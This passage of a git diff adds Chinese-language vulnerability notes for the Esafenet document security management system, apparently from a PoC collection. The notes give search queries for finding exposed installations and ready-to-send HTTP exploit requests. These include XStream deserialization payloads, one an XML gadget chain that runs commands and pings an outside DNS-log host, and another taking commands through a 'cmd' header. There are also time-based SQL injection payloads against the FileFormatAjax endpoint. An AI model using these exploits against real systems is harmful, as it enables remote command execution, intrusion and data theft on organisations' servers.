FNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606620054-9d6ff741-6152-49d2-ade2-e6e344f15b02.png](./img/yTQ58mMqQbk7Uyqu/1706606620054-9d6ff741-6152-49d2-ade2-e6e344f15b02-796516.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cri8yg9zmlzxswvd>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..95ff37e
--- /dev/null
+++ b/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md
@@ -0,0 +1,102 @@
+# 亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/0FvUQBZBTUtW7DR2/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-696413.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/FileCountService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Content-Length: 2657
+Accept-Encoding: gzip
+
+IENBCKMHHBGCCGPJPEFFFOAGCOOGHFFDBAMJLPIIMBFKPMJIJKHJCNIMHIOFPJCFAOJAADMKDCLKKCNINDOAOCDHIEMCNKFEJHAAGDCNPIPABKAKCBCMBAPIOJOINBGBKFNMIHCHPKIHMHKCCHFDNFHAEIGDJFNLBKPGCOGKKMMODNADCINGAHENHPLOHHCABLPKDFDLGBKGJKDINLMAJGEDKHNCOCDFONAMKKBHJGKOHBKIKNFCAEGAJKLJGEIGEOEAIGPHPEBLMNHPJCKEJDBMIEOKEEHHNFHKBIKFELMGLCBPHCAODNFBCGIOJFGECNLKNDFMDGBACCEIGEHHLOGPCIPLIMIGFKNEDFGFKKLKCEOHEJEENEKGFDMNIMHGLPOENCPNPHDHAIIKELIMIOOIDPGFCNGBPJNPEIDCDEPHBMPNFCHCJICOGDDENICOEEEBKFLOAEFKBFPJKNLEBCBLGPHLDAPDBKGNICLNNBLGLICDFAILMEJEDMIGFOGEIHFGJCNDGDKLHBDMFGGGGLMHDNBFECEIDPLGPNJMKHINBNJABNMNCHGAPHJOCBPNDDBJMADOIPFHDDECBIHMPDOIPCADCKOOBAMBPHOLCEOJNBFAOFGCOFKILCBPJGFLOLAAICBCAEFFKLOPGOBANGPHILDODOJNHNOMHKIDACOCGHODPDBBMBKFNEFPACOKBFNKNFNCFIPINBHKBMMGADELHLKDOHDMAMCAJKKPHFLNLIEEAJHIMMCBMGNFCDFGMGODECPJFJMDLOKOEKGJMMDHCBABGAPMHPNHGEFCKGMPIGBEJLLCCPBEAJFIALANKKAPKGNKNELJDNJMAKGOHNDCFKGOAPDDMDHNICGPEFONKBEFCOGPFFBEMMHEMIPBLEJFJAFJINIMMKGHBHAGDBMHHIINDNDNOHGOCAGIEAFEMHBOGEJNMKEHJIMANMICIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKECKBBDHFFNLAIHBBJIDBMCACIBMPELHBKJOBNMJHFGFDONBHIDABKIFFLFFONJAGDOEHEDLILAFKGHMFEPDJBMKCOBLFBBPKKFJDBAFLIDEEJIGCILEJCPHMPJDEAFLDCGFIBBIAIJELJELGGJOGKKGFJAPBPHDOPDGGNPLEDJOJNNNOLGCEMBLECPLOEDPOEAKFPALMOOEOJCJOOIDFDJMNAAMBMDOFKEHAGPGMCFOACPGHKDBDLHALONFAJLOGEIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEENNMJNJDLNKCCGIMKEDFNNGMAAENLKHONOPHFBIGELCBHLDIBFCOKJKEFFFEODJJMONDDDGIMIJAEPCLOAIKKJFGEOGEKHOHKABBOEFEHMGJPDFBPMCHPBIBOAMAGPOBICFGGJGFBGLJFONGBGHCNMDLHOPJHFDCMIAFFOKBKCGFEKGAGGGCKEOEOGCJANKKIBKJBMIHLGJIMELPHHCDFNNDAHKHMMHAPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHEPGGDNMIGEJICGKKCKNPOGPDCENCPIGEJOJEGHHHHLIGIEFIDHHBADCOMLOILLCMNAGIPHJNJNINNGBOIJEIIEBCKHNDBBIJIBHMPHMCFDGLAKAIJCDCMLIODBPCMCMHGDGODKBCJIGEHMLNFIPFDIHELCJKNFIFONFHIHIPKIFBCNDBPJLHONIMGOLOGDHAMKJNBIHCPOJHBGNBNJGHJFNNDHBNEMGHOKFLBFLKIIOBKGCCKJHMHMJPCHDHMHDNJPKPEPKKDEIBPCCDOBAFOKAIOHJGDKBNHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOFNPDDLNCEIDDNKBINIELBKPIBKPBDPGGGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDKMBPDOPNAICNNDNPCCMNOJCOFHNAPOLNCOJCEMKDDBBDCCJKFMJNEEEOKNMGDCKJHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOIECONEAJCCAGGKDAAOPCHLHGFGIICLPCPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHGOKEINIBDALBDPHDGABDBLOKCPCLJBGEBJABHBJKKMPKNBOACJOEDCGLHMLNJCIGPDENPGODCDFMLKCFJEMFDONJKPJFMJKLNGIIOLFNIEKPDLLFDDLFOBDAKJECFNCICGBOGOKMFAPKCNCBHECFFCAEBAKIJKEDGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDIBOKPKOPNMOGLJIPHKOBOABIDKNNAJMOCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDAEIAHAOKMBAPHMAMJEHADCHNLLMFBJBHBHHNLELIFCBNHACHNAFCIOAKOLJJBOGNIGMCEMOBKNNJCKAIBNFMALPKNACFCNIMDIFAKBFCCEMKLBOJNJJMGFPKFAMFINCIIDIGGANFCJLEEIFNHGEDLCGOADFFKBFMKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHEHJJPOHBKABNIPLFDBLOHBEPEJHKJGPPIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEABDPFDCBALFHCJFFCIFMMCGDJFOBBMIJDABFJEBOINJFJIEMNKLMANHBJACCEMAAEJIAHGENPCCOIPMINBLODFHOEFEMMMNLANHOFKKGLONPGFFCCLMHPIBKOEGEJEOFNGLHFFFCJPOBKBAEBOCJJHOHFCPDFNPDGKNOGJCFAHOBHBLMEMEFCBIJIPAPGODFOGFOFCHHAJKGFHFAFMAFJFCAMIAIGJAPFNPDLDFLDOBDHGJFPPANDAIBBGAHHBCIGGBILAMDIAEFNBJIDBEKEPFAHJKKCADDPCKCEPNNEJOLDKABIAPEBOIINFMDPDHEPFOMCIFMBKHPAHMIGKEIPPCDGJNIEAEIHOKGFAGPMFAONMIGECMBIMFFDEEEOBHGIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEAPPGKFOOOBKPEGIAJOPBAHGPPLGCKEGBJGJPFKGNECMPFABADCPAPIJOCJEMFCEEBHALEIHPAIAMOGIHJAJKJLJMADMOOCEGCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDHEHJFDDHJMNBBGOPGCELILLONJNFJKDKLMEJOGPIMPDIBBMPMALGJPHEEDDAHKLAHNGJBMHNLJLJCKIGOGLGPGEPABONGLEDGJIEMNOLFBFNJKJBAMKANBMAAGMNAJOIMPCIBBDEMMJEANGBHHEDELPBGIKDLAMHLPHOPNFNPLKFCLHADEDOJEBIMNIOGEEHKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHLKKOCMJJOGMFNIDPPDLHBNGNEMFEIMIEDFJPMFEIIFFHGFIEGMGBLFKKPGJKKOBMFIHCACNMDEHJLLOANAIHAHFGELFEOJMABALGMENKFNBNPMLDIKPJHBKGEAIBGDIMIAGDAIENNHBABAEGJGPFIFHAHOOPOCKBLNJPJACLFAAIMKFDMFILOFBMAPJPJMOHNNMANGFNJEMNFBJCCNGFLICOKDMHACNPEPGCHIJOKMKPDBJIKFOMPCNBILHGLJJJALBPNBBBLJLNALCKBJBMOHOPIPFKPAKOBALGMENKFNBNPMLDIKPJHBKGEAIBGDIMNNIKHPBFJAKOEEPBOAIIKOEICJOMCGADMMKJNGNAKEHMDDBMJGGLJLGHLAIOIFBLHLLLCIEMKHCBANEHPHAMPCPJACHMBGPHMMMBCKFHHGJBBBGFIHENAKJEHOOACLADMKFJIDGEHNANAACDIGJDINCAMEHOIIPJHAAIBIPMEEHLIOBHGMICGAALCEKFNFNBJNACEHDMDEGCPMNPAAFFHHJKMPMADKBBLGKKJMEJDKAHLEKIDFPKLLJENFDHJDMPKFGNGKEBJBEBPLKCHJMCBALICLGNGDCAMFNCNJGFIEODKPOBNJHGIIICPOGICEBIJFLCIHGOELNDCLIMKJBLGOAONEFFJKOLFLLIDOEJAECJPDPJHAGFNDAPGEGNPJODCPGFMAJHIINKLILMALMNEFHBGHMGGODBKFPKGPIAPMFEJOANAHEIGFJNOOMAOHKBIGLFEJMDICOLEAPNJIPDBMHLOCFBCBDKKAAHBEINNPFDAGOOKOAPFCPHDKNBNIAOFIBFBKLBFAKICAOJPOKPJNDEHGEHAMMEEKKIOAANIDMOAGKEIBNCKPMLPJGDMONAPMAGGPMDJIPBNDMPDGINGBCGEPDDDINPFJHEKKJIPPADMOKJPIEBAIBCJBGOJFEBLHNBLFABAMDPFDEANKPDEAENBLGIMIMLKBDFHEFHHJLPGGBENHGMLGLPJMPMPFEKGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLFEEIKMICBBDONOABFHNMGHPLKOEPPBDDGKBNCJGIFJECLHGBLHDIEJOIAILLEJNJGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLDAGMKNALPEGPCBCPBKEAAEKPLHIEKGLGPCAFBBPGHBMBDLMPHIOPCNNMFPJHKNINKHNJANGIHKHEDDGKGEFJIEPOCGFGLALANFMLAAJIFPIBIJBAFBHDDOJPPAHMFPGNMPGBJKFBCLEMAGKMJGMENMFPMDHKAFFKKNHNICEPICAPIBAJHFKDHHNLHBAGHJFEFEJELFBJFOECBNGODBBKBANCCABIPMGJABODCIMNPOAECKBECOGDJJDNKLJFGDNGFAAIGDEBMFIFMLBAGHJNNGJACPKEMENKDBIMOLFAEAGNFOFEFNHJMJFDEDCJAGGGPFOHNHIIDJLMFNGHLPEENAGKAEBAONIMGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLKCBFIGPBJLEODJIOPEALFLKCAJPFKMLONOBAMEHEOLAMHEOGLFJAOPGOCJPMOJCACFDBCMGCFNNLHIEPLOHLIICJAAKINIBHEHPLBFNMFEINBBMHMAJKNDFEPJFCPEOCGOHENHIAHNBBPAAICKCDAOJMMHMDDAANEAIPCCGLLNFIMFHJKKGFLMHILLMLEGFIPABOAMBDDEBCHEHPLHJHNDFCNBFABAPJANNLLHLNNNLLIAIHKHGDPAJOJOAPIPGNJNIHDKKFPNMKDCEKHAFJFKPFOKLFABGEBOFLFCGCCJ
+```
+
+![1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea.png](./img/0FvUQBZBTUtW7DR2/1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea-856627.png)
+
+获取命令执行结果
+
+```plain
+/test.txt
+```
+
+![1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37.png](./img/0FvUQBZBTUtW7DR2/1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37-825432.png)
+
+```plain
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command class="java.util.Arrays$ArrayList">
+                        <a class="string-array">
+                          <string>cmd</string>
+                          <string>/c</string>
+                          <string>ping</string>
+                          <string>cnvd_test.zfdaqyzxch.dgrh3.cn</string>
+                        </a>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
+```
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xyoufkqvrrixgyhy>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..772fa45
--- /dev/null
+++ b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md	
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` FileFormatAjax`接口的`fileFormatId`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../FileFormatAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=delFileFormat&fileFormatId=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..acb06b7
--- /dev/null
+++ b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md
@@ -0,0 +1,55 @@
+# 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/ArO4K6L-C-r-Uxgf/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-628978.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+ 
+command=delFileFormat&fileFormatId=12';WAITFOR DELAY '0:0:5'--
+```
+
+![1706854421336-072c0e24-f509-4147-b269-327ad3ae199a.png](./img/ArO4K6L-C-r-Uxgf/1706854421336-072c0e24-f509-4147-b269-327ad3ae199a-597539.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+ 
+command=delFileFormat&fileFormatId=12
+```
+
+![1706854564781-683677a7-30a0-4665-95a0-f5419f289abd.png](./img/ArO4K6L-C-r-Uxgf/1706854564781-683677a7-30a0-4665-95a0-f5419f289abd-491883.png)
+
+[亿赛通电子文档安全管理系统-fileformatajax-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695064-99d7fb48-d6e7-42fc-a035-876619e42867.yaml)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zxyf40yyez20bg4g>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..9d75228
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/w2S5lXWsKhKjT4IE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-631956.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/GetMakeOutSendFileInfoService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFB